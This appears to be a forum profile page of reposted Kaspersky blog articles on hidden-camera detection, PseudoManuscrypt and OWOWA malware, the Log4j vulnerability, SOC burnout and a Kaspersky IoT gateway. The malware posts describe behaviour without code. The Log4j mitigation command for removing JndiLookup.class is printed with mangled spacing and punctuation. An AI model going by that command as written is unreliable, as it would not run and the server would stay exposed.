Jump to content

KL FC Bot

Members
  • Posts

    49
  • Joined

  • Last visited

    Never

Posts posted by KL FC Bot

  1. To the average person, directional microphones, hidden cameras, and other surveillance equipment are the stuff of spy movies. Yet such devices can be found everywhere: from small rented apartments to expensive hotel rooms, from the office to the gym, even in your own home. Today, we explore ways to find them.

    Big Brother’s little siblings

    Miniature cameras are inexpensive (at the time of this writing, prices start at about $4), and they connect to regular Wi-Fi to transfer data — say, to the cloud. That means pretty much anyone can play at being a spy in real life. Why would they?

    In some cases, owners of rental apartments install them in case of theft or damage to property. Suspicious spouses and unscrupulous rivals have other reasons. As do pranksters. Then, there are professional extortionists. Simply put, loads of people have loads of excuses.

    How likely are you to encounter surveillance in everyday, private life? A survey of Airbnb users revealed that 11% of respondents had come across a hidden camera in rented accommodations. And those are just the ones who found something; not every renter carefully inspects the furnishings. What’s more, finding such cameras is not always easy. Lenses may be as small as 2 millimeters in diameter, and the box is usually hidden or camouflaged. How are you supposed to know you’re being spied on?

    Method 1. Hire an expert

    The most reliable way to find hidden spy equipment is to entrust the search to a qualified technician with professional equipment. Today, you can find such experts in almost any city; for example, on Craigslist or another website with classified ads.

    Pros:

    • Efficiency
    • Reliable results
    • Minimal personal effort

    Cons:

    • Price
    • Potential wait time
    • Hotel or apartment restrictions

    Summary

    If you are worried and plan to stay somewhere for a while, or if you’re moving in, hiring an expert may be worth the time and money.

    Method 2. Use dedicated equipment

    You can buy electromagnetic radiation detectors, optical detectors, and other equipment for detecting hidden cameras and use them to check each room yourself. The cheapest ones, with a detection radius of only a few feet, start at $3; professional and more powerful ones are obviously more expensive.

    Incidentally, the simplest optical detector can be assembled manually; all you need are some red LEDs and a red-light filter. Direct the light at the suspected camera site and look through the filter — any camera lens in view will appear as a bright dot. Bear in mind that the range of such a device will not exceed ten meters (about 30 feet).

    If you decide to check for yourself, pay particular attention to the bathroom and bedroom, where compromising footage might be filmed, as well as smoke detectors and household appliances, common hiding spots. Also check paintings, clocks, flower pots, and even toys.

    Pros:

    • Independence
    • Option for regular checks
    • DIY potential

    Cons:

    • Short effective range
    • Price
    • Time and skill requirements

    Summary

    If you’re the only person you trust — and especially if you aren’t afraid of soldering some LEDs —this method is for you.

    Method 3. Use a smartphone

    Sometimes you can do without special equipment and just use your smartphone camera and a flashlight. Turn off the lights and draw the curtains (the room must be dark), turn on both the flashlight and phone camera, and point them where you think a hidden device might be lurking. If your suspicions are correct, you will see a glare on the smartphone screen. If you can’t use the phone’s camera and flashlight simultaneously, use a separate flashlight.

    In some cases, you can even do without a flashlight. Many spy cameras use infrared illumination for filming in the dark. It is invisible to the human eye but not to a smartphone camera. When filming in the dark, the infrared light source will appear on the screen as a pulsing dot. Keep in mind that your smartphone’s main camera may not do the trick, because it probably has an IR-light filter, so the front camera is a better bet. You can experiment with a TV remote to find out if your smartphone is good for the job.

    Pros:

    • Free
    • No special skills required
    • No special equipment required

    Cons:

    • Not all phone models are up to the job
    • Time-consuming
    • Inefficient — false positives are possible, and cameras without infrared radiation are not visible

    Summary

    This method is suitable only for a superficial inspection; it’s likely to miss something. Still, it’s better than nothing.

    Method 4. Trust an app

    Mobile apps for finding spy cameras and other hidden devices fall into two categories. The first group finds devices by the lens glare, as in the above-described method. Examples include Glint Finder, which detects the glare (or glint) when the light of a flashlight hits a lens. Once that happens, you just have to check the areas for any hidden devices.

    Apps of the second group are designed to search for wireless spy devices. For them to work, you need to connect to the local Wi-Fi. After scanning the router, the app displays a list of connected devices. Check any you’re not completely sure about, such as your smartphone and laptop. A dedicated tool can help you distinguish harmless equipment from tracking devices by the identifier.

    Pros:

    • Reasonably efficient
    • Minimal costs
    • No equipment required beyond a compatible smartphone

    Cons:

    • Inferior to specialized devices
    • Unsuitable for smart homes with many connected devices
    • Unsuitable for hotel Wi-Fi and other public routers with many connected devices

    Summary
    Specialist software occupies the middle ground between professional equipment and improvised means. It’s probably the best option for cautious travelers, provided they use a trusted app.

    What to do if you detect a spying device

    If you find something that looks like a camera or other tracking device, take a photo of it and do an image search to find out what it might be. It may be harmless.

    But if your fears are confirmed, you should contact the police, hotel administration, or the booking service you used. For example, AirBnB rules explicitly prohibit hidden cameras, so at least some affected guests have gotten refunds or different accommodations.

    Better safe than sorry

    We’ve discussed a few ways to make sure that no extortionist, TikTok prankster, or landlord is filming you without permission. But hidden cameras are not the only danger when traveling. Here are some general tips to help you stay safe in unfamiliar surroundings:

    • Take an external battery to stay connected at all times;
    • Download apps to help your trip go more smoothly, such as maps, dictionaries, and translators;
    • Don’t leave valuables unattended;
    • Never use public computers or terminals for private messaging, logging in to accounts, or online shopping;
    • Use a VPN app to protect your data from hackers, as well as to have access to content that’s not available in the country you are visiting.

    View the full article

  2. In June 2021, our specialists discovered new malware called PseudoManuscrypt. They didn’t go out hunting specifically for it; our standard antivirus engine detected the malicious files, which were similar to known malware.

    Why PseudoManuscrypt is dangerous

    PseudoManuscrypt’s methods are fairly standard for spyware. It starts with a keylogger, grabbing information about established VPN connections and saved passwords. It also regularly steals clipboard contents, records sound using the built-in microphone (if the computer has one), and conducts a general analysis of the compromised system. One variant can also steal the credentials of QQ and WeChat messengers, capture images, and write captured images to video files. Then it sends the data to the attackers’ server. It also includes a tool for disabling security solutions.

    None of the above is weird or surprising. It’s PseudoManuscrypt’s infection mechanism that makes it interesting. For the technical details of the attack and indicators of compromise, see our ICS CERT report.

    Origin of the name

    Our experts found some similarities between the new attack and the already known Manuscrypt campaign, but analysis revealed that a completely different actor, the APT41 group, had previously used part of the malware code in its attacks. We have yet to establish responsibility for the new attack, and for now we’re calling it PseudoManuscrypt.

    Such problems of identification are interesting as such, and they are usually related to attempts by one group of attackers to pose as another threat actor. In general, the strategy of planting false flags is not very new.

    How PseudoManuscrypt infects a system

    Successful infection rests on a rather complex chain of events. The attack on a computer usually begins when the user downloads and executes a pirated key generator for popular software.

    You can find PseudoManuscrypt bait by searching the Internet for a pirated “key generator” to register software. Websites that distribute malicious code matching popular queries rank high in search engine results, a metric attackers seem to monitor.

    Here you can clearly see why there have been so many attempts to infect industrial systems. In addition to providing keys for popular software (such as office suites, security solutions, navigation systems, and 3D first-person shooters), the attackers also offer fake cracks for professional software, including certain utilities for interacting with PLC controllers using the ModBus. The result: an abnormally high number of infections in industrial organizations (7.2% of the total).

    Search results for pirated software. PseudoManuscrypt can be found at the very first link.

    Search results for pirated software. PseudoManuscrypt can be found at the very first link. Sourse.

    The example in the screenshot above features software for system administrators and network engineers. Such an attack vector could provide attackers with immediate, full access to the company’s infrastructure.

    The attackers also use a Malware-as-a-Service delivery mechanism, paying other cybercriminals to distribute PseudoManuscrypt. That practice gave rise to an interesting feature we found when analyzing the malicious files: Some were bundled with other malware that the victim installed as a single package. The purpose of PseudoManuscrypt is to spy, but other malicious programs seek other objectives, such as data encryption and money extortion.

    Who is PseudoManuscrypt targeting?

    The largest number of PseudoManuscrypt detections have occurred in Russia, India, Brazil, Vietnam, and Indonesia. Of the huge number of attempts to run malicious code, users at industrial organizations account for a significant share. Victims in this sector include managers of building automation systems, energy companies, manufacturers, construction companies, and even service providers for water treatment plants. The overwhelming majority of hacking attempts were aimed at developers of certain solutions used in industry.

    Methods for defending against PseudoManuscrypt

    Overall, standard malware detection and blocking tools provide effective protection against PseudoManuscrypt — but they are necessary, and they must be installed on 100% of a company’s systems. In addition, we recommend instituting policies that make  disabling protection difficult.

    For IT systems in industry, we also offer a specialized solution, Kaspersky Industrial CyberSecurity, which both protects computers (including specialized ones) and monitors data transfers that use specific protocols.

    Also keep in mind the importance of raising personnel awareness of cybersecurity risks. You can’t totally rule out the possibility of clever phishing attacks, but you can help staff stay alert, and also educate them about the danger of installing unauthorized (and especially pirated) software on computers with access to industrial systems.

    View the full article

  3. The Matrix trilogy (The Matrix, The Matrix Reloaded, The Matrix Revolutions) told of the successful implementation of the metaverse before the idea went mainstream. The creator of this virtual world (or, rather, neural-interactive simulation), we learn, was an artificial intelligence that once defeated and enslaved humanity. The process was not without bugs, which brings us to today’s topic.

    For starters, between the limited data human characters have and the constant misinformation from the AI, viewers never know precisely what’s true, or how realistic their view of the world is at any given moment.

    But we are not interested in philosophical subtext here; our focus is on information security, so we will rely on what are considered the established facts at the end of the third movie. Spoiler alert for anyone who hasn’t watched the whole trilogy but intends to.

    Fighting the Zion Resistance

    At the trilogy’s finale, it becomes clear that the struggle with rebels infiltrating the Matrix is all staged. For the latest cycle of rebellion to succeed, the Matrix needs a certain number of external enemies, so we don’t know for sure whether the agents are really trying to catch Morpheus and his team, or if they’re just simulating a frenzy of activity. From a cybersecurity perspective, it’s not clear whether we’re seeing bugs or features — a design flaw or something deliberately introduced into the Matrix (perhaps as a sort of honeypot).

    Pirate signal from Resistance ships

    The Matrix’s population consists of avatars of enslaved humans who are wired to the system, and of programs that originally existed in the form of code. Why remote broadcasting of signals from outside the system was initially implemented, allowing third-party avatars to be uploaded, remains unclear.

    Such anomalies are usually a result of some sort of debug access that someone forgot to close, but in this case the developers were not human, so that explanation doesn’t fit. Anyway, even if they implemented remote connection on purpose — if it was a feature, not a bug — why didn’t the auto-programmers implement a firewall to block any pirate signals?

    Uncontrolled avatar transmission system

    Inside the Matrix, pirate avatars can appear and disappear only through phone cables (although how mobile and landline phones differ inside a virtual reality framework is not explained). Moreover, Matrix agents are, in principle, able to deactivate the line — at least, they cut it when Morpheus was captured. But if it is so critical for Matrix infiltration and exfiltration, why don’t the agents ban it, or at least disable it throughout the operation zone?

    Incomplete addressing system

    Despite the objective need for such information, the Matrix lacks precise location data for each specific object inside virtual reality. We can assume that pirate avatars are able to hide their location in virtual space, but to stay on the tail of the still-connected Neo in the system, agents needed an additional tracking device. There’s obviously a fault in the addressing system.

    That raises questions about Morpheus’ notorious red pill. In his words, it is a tracking program “designed to disrupt your input/output carrier signals, so we can pinpoint your location.” Why isn’t the Matrix monitoring for such anomalies? Being able to intercept the “rescue team” seems pretty important.

    Artificial constraints on Matrix Agents

    Matrix agents are AIs that can temporarily replace the avatar of any human connected to the system. They can violate the conventional laws of physics, but only up to a point. The twins from the second part of the trilogy are far less impeded by physics, so why can’t such conditional constraints be lifted, at least temporarily, during the operation to capture perpetrators?
    Adding to the mounting errors in their code, for some reason agents have the ability to disconnect from the Matrix information system simply by removing their earpieces, a clear vulnerability if ever there was one.

    Zion mainframe codes

    The whole point of the machines’ hunt for Morpheus in the first movie was to gain the access codes to the Zion mainframe, which every captain knows. That raises a host of questions about why the person with the access codes to the rebels’ critical infrastructure would also be the one who goes into the Matrix.

    That point is especially strange if one recalls that there are people on board without any interface for connecting to the Matrix. Entrusting valuable information to them would obviously be far safer. It’s a misstep by the liberated humans, plain and simple: equivalent in today’s real world to attaching a sticky note with passwords to your monitor and then giving a TV interview with it in the background.

    Rogue software

    For some reason, the Matrix is unable to effectively get rid of programs that are no longer required. Lurking deep inside are various smart apps from old versions of the Matrix: information smugglers, semiphysical militants, a program called Seraph that defines its function as “I protect that which matters most” (a predictable slogan for any information security company).

    According to the Oracle, they should all have been removed, but instead they chose to disconnect from the system and live autonomously inside the virtual reality. The existence of uncontrolled obsolete software is a clear vulnerability, just as it is in real life. They literally help hackers attack the Matrix!

    Software smuggling

    Some programs exist exclusively in the “world of machines” yet can be smuggled in to the virtual world of the Matrix, which human avatars can inhabit. The ability to bring in such programs highlights some serious system segmentation issues. In particular, a direct communication channel should not exist between two segments designed to be isolated.

    Backdoor corridor

    Among the exiles is the Keymaker program, which creates keys for backdoors. We don’t know to what extent the Keymaker actually is an exile — perhaps he, like the Oracle, is part of the system to control the rebels through the Chosen One. Not only does the Keymaker cut access keys using a file and a lathe, but it also informs hackers of the existence of a whole corridor of backdoors granting access to different parts of the Matrix, from the Core Network to the Source, the heart of the system. Both the Keymaker and the corridor pose a fundamental security threat to the entire system, especially considering how it’s protected against outsiders.

    The main problem with the corridor’s security is that for some reason it exists according to the notional laws of the virtual world, depending on emulated power plants (that do not actually produce power) and computers at these virtual stations. And these laws in the Matrix, as we know, are notoriously easy to break. Even putting an agent in the corridor would be more effective — so why didn’t they? No money to pay its salary?

    Clones of Agent Smith

    Matrix agents originally had a feature that let them replace the avatar code of any hardwired human. However, agents have always existed as individual copies. At the end of the first movie, Neo, having acquired anomalous abilities, infiltrates Agent Smith and tries to destroy him from the inside, with some part of the code of Neo’s avatar being transferred into the agent’s code. After that, Smith goes haywire and gains the ability to bypass artificial constraints, both the laws of the physical world and the ban on existing in one copy. In other words, he becomes a full-fledged virus.

    By all appearances, Smith is the first virus in the Matrix; otherwise, there is no explanation for why the system has no antivirus solution for tracking software anomalies, isolating and removing dangerous applications that threaten the security of the system. Considering that most of the people freed from the Matrix are hackers, we find that very odd.

    Be that as it may, the existence of Smith, now able to copy his code into any avatar or program, serves as an argument in Neo’s negotiations with the AI. In the end, Neo physically connects to the Matrix, allows Smith to “infect” his avatar, connects to the Smith-net, and destroys all of the Smiths.

    As a result, the machines agree to a truce, to stop exterminating humans, and even to release those who don’t want to live in the Matrix. But they could have just built a secure operating system from the start, or at least used a reliable security solution in combination with an EDR system capable of tracking network anomalies!

    View the full article

  4. This week on the Kaspersky Transatlantic Cable podcast, our good friend Ahmed is a bit under the weather, so we return temporarily to our original podcast lineup.

    We jump right in with the story everyone’s been talking about: Log4J. We start out with an overview of what is going on there and then hop into a second story about botnets leveraging the vulnerability. After that, we discuss a case of fat fingers causing an NFT to be sold for $3,000 — sounds like no big deal, but it was valued at $300,000. Once that cheap sales went through, the item was flipped for a whole lot more money. Talk about an oopsie.

    This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.

    — Marcus Hutchins (@MalwareTechBlog) December 10, 2021

    From there, our discussion shifts to Instagram. Prior to its grilling by the US Congress, the social network announced some changes to the platform. The changes aim to improve users’ experiences and avoid some of the associated harms such as bullying, damage to self-image, and more. Dave and I debate a bit whether it’s just a PR stunt or something that will really benefit society.

    Our fourth story has us diving into a lawsuit Google filed against some hackers. The problem is that it appears largely symbolic.

    For our final story, we head to China, where a man stole more than $20,000 from an ex-girlfriend by unlocking her phone and bank account while she was sleeping — creepy! And to close out the podcast for the year, we offer some tips for anyone who gets new electronics over the holidays.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     

    button-subscribe-apple.pngbutton-subscribe-spotify.pngbutton-subscribe-google.pngbutton-subscribe-rss.png

     

    View the full article

  5. A malicious Internet Information Services (IIS) module is turning Outlook on the web into a tool for stealing credentials and a remote access panel. Unknown actors have used the module, which our researchers call OWOWA, in targeted attacks.

    Why Outlook on the web attracts attackers

    Outlook on the web (previously known as Exchange Web Connect, Outlook Web Access, and Outlook Web App, or simply OWA) is a Web-based interface for accessing Microsoft’s Personal Information Manager service. The app is deployed on Web servers running IIS.

    Many companies use it to provide employees with remote access to corporate mailboxes and calendars without having to install a dedicated client. There are several methods of implementing Outlook on the web, one of which involves using Exchange Server on site, which is what cybercriminals are drawn to. In theory, gaining control of this app gives them access to all corporate correspondence, along with endless opportunities to expand their attack on the infrastructure and launch additional BEC campaigns.

    How OWOWA works

    OWOWA loads on compromised IIS Web servers as a module for all compatible apps, but its purpose is to intercept credentials entered into OWA. The malware checks requests and responses on Outlook on the Web login page, and if it sees a user has entered credentials and received an authentication token in response, it writes the username and password to a file (in encrypted form).

    In addition, OWOWA allows attackers to control its functionality directly through the same authentication form. By entering certain commands into the username and password fields, an attacker can retrieve the harvested information, delete the log file, or execute arbitrary commands on the compromised server through PowerShell.

    For a more detailed technical description of the module with indicators of compromise, see Securelist’s post.

    Who are the victims of OWOWA attacks?

    Our experts detected OWOWA-based attacks on servers in several Asian countries: Malaysia, Mongolia, Indonesia, and the Philippines. However, our experts have reason to believe the cybercriminals are also interested in organizations in Europe.

    The majority of targets were government agencies, with at least one being a transport company (also state-owned).

    How to guard against OWOWA

    You can use the appcmd.exe command — or the regular IIS configuration tool — to detect the malicious OWOWA module (or any other third-party IIS module) on the IIS Web server. Keep in mind, however, that any Internet-facing server, like any computer, needs protection.

    View the full article

  6. At the tail end of 2017, Eugene Kaspersky made a bold announcement: that we would be launching our Global Transparency Initiative. The program has since given our prospective customers, governments, and partners the unprecedented ability to inspect our source code.

    Trust in cybersecurity being vital, the company knew transparency needed to be more than just words — and that revealing our source code in any way meant we needed extra levels of security. To address the first part, we decided to open up Transparency Centers around the world where the folks listed above could inspect our code in a safe and secure location. In addition to satisfying any concerns they had, they could also help further debunk media myths about backdoors or other nonsense. The first of the centers was in Zurich, Switzerland; others opened elsewhere in Europe as well as Latin America and Asia.

    The latest is in Fredericton, New Brunswick, Canada. As a US citizen, I’m excited about this opening it’s just a short flight and drive away. To get a good look at any other centers would involve flying across the Atlantic! Aside from my general interest in checking out the center, I was pleased to sit down recently with Robert Cataldo, Kaspersky North America’s managing director, to discuss why our newest center is so important to the company’s business.

    Jeff Esposito: Rob, can you tell us a bit about why transparency is important to Kaspersky?

    Robert Cataldo: Transparency should be an important principle for every organization, but especially for those in cybersecurity. Industry, academia, government, and consumers trust us to protect their most precious and confidential information. To maintain and build this trust, we consider it essential to clearly communicate the transparency measures we’re taking and to allow interested stakeholders the opportunity to evaluate all aspects of our business practices and development procedures.

    JE: This is the first Transparency Center on this side of the Atlantic; why is it important for the business — and why Canada?

    RC: Our global vision for the formal transparency initiative established about four years ago included a physical transparency center in North America where interested parties could come and conduct code reviews or even be trained on what to look for during such reviews. We felt it important to deliver on this vision to ensure that we have accessible transparency centers for all the major regions around the world where we operate. We considered many factors when choosing the location for North America, but a big driver for being in New Brunswick became the partnership we could enter into with CyberNB, which now hosts our facility in its brand new Cyber Centre.

    JE: What does this center mean for the business in the Americas?

    RC: The center is a big step toward setting the right example in North America and creating a high standard of openness in our industry.

    JE: What will a verified customer or partner get to experience in the Transparency Center?

    RC: In addition to conducting a full review of our source code, rules, and code base updates, customers and partners can also be trained on the important elements to look for as part of our Cyber Capacity Building Program. Moreover, while there, we can also arrange for product briefings and/or demonstrations for anyone interested.

    JE: What can we expect from our partnership with CyberNB? How does it help further the message of the GTI?

    RC: CyberNB fosters collaboration, sharing, and improved cybermeasures among critical infrastructure, industry, academia, and government and holds a common vision with Kaspersky concerning the importance of transparency in our industry. They have their own transparency center in the Cyber Centre, which creates an opportunity for us to compare notes and help each other improve. CyberNB has also created a member program referred to as CIPNet, short for Critical Infrastructure Protection Network. Kaspersky is a proud member of CIPNet and we’ve already begun exploring synergies with other members to proliferate our transparency principles and further our mission of building a safer world for our partners and customers.

    Cyber Center in Fredericton, New Brunswick

    JE: Talk a bit about the Cyber Centre, the building that our Transparency Center is housed in. I heard you were able to visit and tour the facility. Is that correct?

    RC: The Cyber Centre in Fredericton, New Brunswick is brand-new, and I was fortunate enough to be invited to tour the facility in early December. The center is a modern, world-class building with a well-planned layout for large briefings, small business collaborations, transparency reviews, product certifications, trainings, and all kinds of business events. The center also houses CyberNB’s critical infrastructure SOC, which features large displays of the various forms of threat intelligence — including Kaspersky’s own threat data feeds — and security tools CIPNet members can take advantage of.

    Access to the Transparency Center is available on request. To learn more about Kaspersky’s Global Transparency Initiative, please visit its website.

    View the full article

  7. Various information security news outlets reported on the discovery of critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). Millions of Java applications use this library to log error messages. To make matters worse, attackers are already actively exploiting this vulnerability. For this reason, the Apache Foundation recommends all developers to update the library to version 2.15.0, and if this is not possible, use one of the methods described on the Apache Log4j Security Vulnerabilities page.

    Why CVE-2021-44228 is so dangerous

    CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system.

    What makes CVE-2021-44228 especially dangerous is ease of exploitation: even an inexperienced hacker can successfully execute an attack using this vulnerability. According to the researchers, attackers only need to force the application to write just one string to the log, and after that they are able to upload their own code into the application due to the message lookup substitution function.

    Working Proofs of Concept (PoC) for the attacks via CVE-2021-44228 are already available on the Internet. Therefore, it’s not surprising that cybersecurity companies are already registering massive network scans for vulnerable applications as well as attacks on honeypots.

    This vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.

    What is Apache Log4J and why this library is so popular?

    Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and that is why most Java developers use it.

    Many large software companies and online services use the Log4j library, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more. Because of the library being so popular, some information security researchers expect significant increase of the attacks on vulnerable servers over the next few days.

    #Log4Shell pic.twitter.com/1bKDwRQBqt

    — Florian Roth ️ (@cyb3rops) December 10, 2021

    Which versions of the Log4j library are vulnerable and how to protect your server from attacks?

    Almost all versions of Log4j are vulnerable, starting from 2.0-beta9 to 2.14.1. The simplest and most effective protection method is to install the most recent version of the library, 2.15.0. You can download it on the project page.

    If for some reason updating the library is not possible, Apache Foundation recommends using one of the mitigation methods. In case of Log4J versions from 2.10 to 2.14.1, they advise setting the log4j2.formatMsgNoLookups system property, or setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.

    To protect earlier releases of Log4j (from 2.0-beta9 to 2.10.0), the library developers recommend removing the JndiLookup class from the classpath: zip -q -d log4j-core – *. Jar org / apache / logging / log4j / core / lookup / JndiLookup .class.

    In addition, we recommend to install security solutions on your servers — in many cases this will allow you to detect the launch of malicious code and stop the attack’s development.

    View the full article

  8. Between the monotony of painstakingly searching for anomalies and the enormous responsibility of ensuring a company’s security, security operations center (SOC) employees endure constant stress. My hope is that sharing my experience as the head of a SOC that provides managed detection and response (MDR) service can help shed some light on SOCs in general, so I’d like to share my five steps to minimize stress and prevent burnout in the SOC.

    Step one: Complete the team

    Organizing your team is key. You need enough people to keep up with the work but not so many that they end up bored. You’re looking for a balance, and finding it is no mystery.

    To begin, define the scope of the work you need and then break down the roles you need to fill: what security services you need in house and what to outsource. Use that breakdown to sketch out your target head count, keeping in mind that you’ll need internal professionals to manage outsourced functions;

    • Start with six people, which is really the minimum a SOC needs to operate. That’s two for monitoring, one for investigation, one to function as architect and engineer, an administrator, and a SOC manager;
    • Think in advance about mitigating the negative impact of turnover to minimize the effects of workload increases on team members.

    Step two: Make work rewarding

    Effective work tends to require motivation. Of course, you need to provide the conditions for growth and comfortable work, but also consider the very obtrusive potential of demotivating factors — so, for example, think about ways to make goals transparent and assessments clear and reasonable. People strive to reach new professional heights, and they excel when they find the work rewarding.

    • Encourage leaders and reward effort rather than silencing newcomers or punishing failure;
    • Ensure good working conditions, including adequate wages and benefits, social programs, time for physical activities, and healthy team relationships;
    • Clarify goals, objectives, and the metrics by which you and the company measure employees’ work;
    • Specify a transparent career path, making sure colleagues understand which team is responsible for what and how to achieve promotions or transfers.

    Step three: Relieve stress

    The job of a SOC analyst is stressful all by itself, making any pressure reduction particularly important. You can’t make the job a cakewalk, but you can take a few simple steps to help ease SOC workers’ loads.

    • Let employees manage their own time. As long as having flexible hours doesn’t affect performance — which you addressed in step two — it shouldn’t cause any trouble;
    • Exchange feedback with your team. Transparency and trust go both ways;
    • Support your team. Workers should feel confident in the face of difficult situations and expect help from management or dedicated experts.

    Step four: Inspire your teammates

    Working in a SOC means being part of a team. Devote some time to analyzing the team, seeking optimal combinations of employees, understanding what tasks each of them performs best, and bolstering team spirit.

    • Give employees varied, nonstandard tasks from time to time. That serves the dual purpose of keeping them interested and helping you learn each team member’s strengths and preferences;
    • Give each team member a sphere of responsibility so they know their contributions are important and valuable;
    • Provide opportunities for professional development, including networking and participation in training courses or webinars;
    • Conduct collaborative team-building activities. As a manager, you may find the different structure of collaboration outside of a work environment reveals qualities that contribute to the team’s productivity.

    Step five: Minimize routine

    Overreliance on routine is a major contributor to burnout. Now, as I said at the start, monotony is part of the job, and you cannot get rid of most routine processes. That said, you can at least minimize the harm with a bit of intelligent outsourcing and task automation.

    • Engage outside specialists in routine activities or tasks where sensible and productive;
    • Implement tools and services to facilitate common IT security practices;
    • Continuously research new areas, and automate everything you can.

    Reallocating resources and tasks is never easy or automatic. Although offloading work sounds appealing, first consider the importance of keeping employees interested and motivated. Some functions may need to stay in-house for legal or other reasons, and for those that can move outside, you’ll need to ensure contracts clarify liability and consequences, not just responsibility. And before automating certain tasks, analyze the relevant work processes, consider user feedback, and identify any problems on the team to develop a realistic and appropriate plan.

    View the full article

  9. After a brief hiatus in old Constantinople, Ahmed and I rejoin David just in time for this week’s Kaspersky Transatlantic Cable podcast, episode 231.

    🌞 Gm it's LAND Sale day!

    Who's ready to Enter Tha SNOOPVERSE!?https://t.co/vGFQoyikDY https://t.co/wp6B0aokiD

    — The Sandbox (@TheSandboxGame) December 2, 2021

    To kick things off, we enter The Sandbox metaverse and get into its land sales —in this case, the opportunity to be Snoop Dogg’s neighbor. Well, sort of. Believe it or not, one of the NFTs sold for a whopping $450,000. And yes, you read that right, someone ponied up the cost of a home — or several, in many US markets — for a plot in the Snoopverse. Virtually living next to the virtual doggfather? What a time to be alive!

    From there, we head back to familiar territory for a look at Facebook’s removal of its self-imposed ban on cryptocurrency ads. Then, after a brief quiz break, it’s a pair of stories about disinformation and what Facebook and Twitter are doing to battle it on their platforms (not enough).

    To close out the podcast, we chat about a new phishing scheme using the Omicron variant of COVID-19 to attract UK victims.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     

    button-subscribe-apple.pngbutton-subscribe-spotify.pngbutton-subscribe-google.pngbutton-subscribe-rss.png

     

    View the full article

  10. Ten years is a long time in cybersecurity. If we could have seen into the future back then and just how far cybersecurity technologies have come on by 2022 – I’m sure no one would have believed it. Including me! Paradigms, theories, practices, products (anti-virus – what’s that?) – everything’s been transformed and progressed beyond recognition.

    At the same time, no matter how far we’ve progressed – and despite the hollow promises of artificial intelligence miracles and assorted other quasi-cybersecurity hype – today we’re still faced with the same, classic problems we had 10 years ago:

    How to protect data from non-friendly eyes and having unsanctioned changes made to it, all the while preserving the continuity of business processes?

    Indeed, protecting confidentiality, integrity and accessibility still make up the daily toil of most all cybersecurity professionals.

    No matter where it goes, ‘digital’ always brings with it one and the same problems. It has done, it does, and it will continue to. But of course it will – because the advantages of digitalization are so obvious. Even such seemingly conservative fields like heavy machine building, oil refining, transportation or energy have been heavily digitalized for years already. All well and good, but is it all secure?

    With digital, the effectiveness of business grows in leaps and bounds. But on the other hand, all that is digital can be – and is – hacked, and there are a great many examples of this. There is a great temptation to fully embrace digital – to reap all its benefits; however, it needs to be done in a way that isn’t agonizingly painful (read – with business processes getting interrupted). And this is where our new(ish) special painkiller can help – our KISG 100 (Kaspersky IoT Secure Gateway).

    Kaspersky IoT Secure Gateway 100

    This tiny box (RRP – a little over €1000) is installed between industrial equipment (further – ‘machinery’) and the server that receives various signals from this equipment. The data in these signals varies – on productivity, system failures, resource usage, levels of vibration, measurements of CO2/NOx emissions, and a whole load of others – but it’s all needed for get the overall picture of the production process and to be able to then take the well-informed and reasoned business decisions.

    As you can see, the box is small, but it sure is powerful too. One crucial functionality is that it only allows ‘permitted’ data to be transferred. It also allows data transmission strictly in just one direction. Thus, in an instant KISG 100 intercepts a whole hodge-podge of attacks: man-in-the-middle, man-in-the-cloud, DDoS attacks, and many more of the internet-based threats that just keep on coming at us in these ‘roaring’ digital times.

    KISG 100 (which works on the Siemens SIMATIC IOT2040 hardware platform and our cyber immune KasperskyOS) divides the external and internal networks in such a way that not a single byte of malicious code can possibly get between the two – so the machinery stays fully protected. The technology (for which we have three patents pending) works based on the data-diode principle: opening the flow of data in only one direction and only upon certain conditions having been met. But, unlike competing solutions, KISG does this (i) more reliably, (ii) simpler, and (iii) cheaper!

    OK, let’s have a closer look…

    It’s not for nothing this little box called a ‘gateway’, for in principle it works just like the mechanical hydro-technical gateway found on canals – a lock. You open the lower gate, the boat goes into the chamber; the water level rises, the upper gate opens, the boat leaves the chamber. In the same way, KISG 100 first initializes the agent of the source from the industrial network, then connects it with the agent of the receiver of data in the direction of the server and allows the one-way transfer of data.

    Once a connection is made between the machinery and the server, the system has a so-called protected status: access to an external network and also untrusted memory is forbidden to both agents (source and receiver), while access to trusted memory (from which they receive working parameters like encryption keys, certificates, etc.) is permitted. With this status, the gateway can’t be compromised by attacks from an external network – since all its components at this stage are disconnected from external world and are considered trusted; they are only loaded and initialized.

    After initialization, the status of the gateway is changed to active: the receiver agent gets the right to both transfer data to an external network and access untrusted memory (in which temporary data is contained). Thus, even if there’s a hack on the server side, the hackers can’t get to the other components of the gateway or the industrial network. Like this:

    immunizing-factories-ksig-100-1-EN.jpg

    Control over the observation of rules of interaction between agents, plus switching the statuses of the gateway is done by a cybersecurity monitor KSS. This isolated subsystem of KasperskyOS constantly monitors observance of pre-defined security policies (what component can do what) and, as per the ‘default deny’ principle, blocks all forbidden actions. The main competitive advantage of KSS is that the security policy are very convenient to describe with a special language and to combine different pre-defined models of cybersecurity. If just one of the components of KISG 100 (for example, the receiver agent) turns out to be compromised, it can’t harm the rest of them, while the system operator is informed of the attack and can get to work dealing with it.

    So, you still with us? Then here comes the inevitable ‘wait, there is more!’…

    The tiny box can help provide additional digital services. It allows safely integrating industrial data in ERP/CRM and assorted other business systems of an enterprise!

    Scenarios involving such services can vary greatly. For example, for our respected customer Chelpipe Group (a leading producer of steel pipes), we calculated the efficiency of a machine-tool that cuts pipe. Thanks to this predictive analysis, up to $7000 per month can be saved on outlays when choosing to buy such a tool (!). In fact, such integration provides simply endless possibilities.

